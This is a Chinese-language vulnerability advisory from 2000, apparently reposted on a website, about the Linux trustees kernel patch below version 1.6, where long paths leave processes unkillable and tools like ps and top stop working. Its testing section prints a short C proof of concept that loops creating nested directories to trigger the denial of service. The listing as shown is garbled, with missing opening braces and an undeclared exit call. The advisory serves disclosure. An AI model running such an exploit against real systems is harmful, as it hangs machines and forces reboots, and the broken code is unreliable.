Linux

发布日期：2000-04-11
更新日期：2000-04-11

受影响系统：

trustees 1.5 for linux 2.2.14
版本号低于 1.6 的 linux trustees

不受影响系统：

高于 1.6 的 linux trustees

描述：

---

Linux trustees 是一个给Linux 提供类似于Netware支持的内核Patch,缺省情况
下并没有安装。在安装了有问题的 Linux trustees 的系统中，当进程访问一个带
有长路径的文件或目录时，该进程就会处于一种不能被杀死的状态。
所有其他的进程访问该进程的 /proc 入口时就会出错. 一些系统工具如ps, w,top,
killall,就会停止工作。这时就只能通过重新启动系统来解决。
值得注意的是该漏洞不一定限于本地，在远程访问系统时也有可能出现。

<* 来源： Andrey E. Lerman (lae@UNIYAR.AC.RU) *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
while(1)

if(mkdir("aaaa",0777)<0)

perror("mkdir");
exit(1);
}
if(chdir("aaaa")<0)

perror("chdir");
exit(1);
}
}
return(0);
}



建议：

---

在高于 1.6 的 linux trustees 中已经修复。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有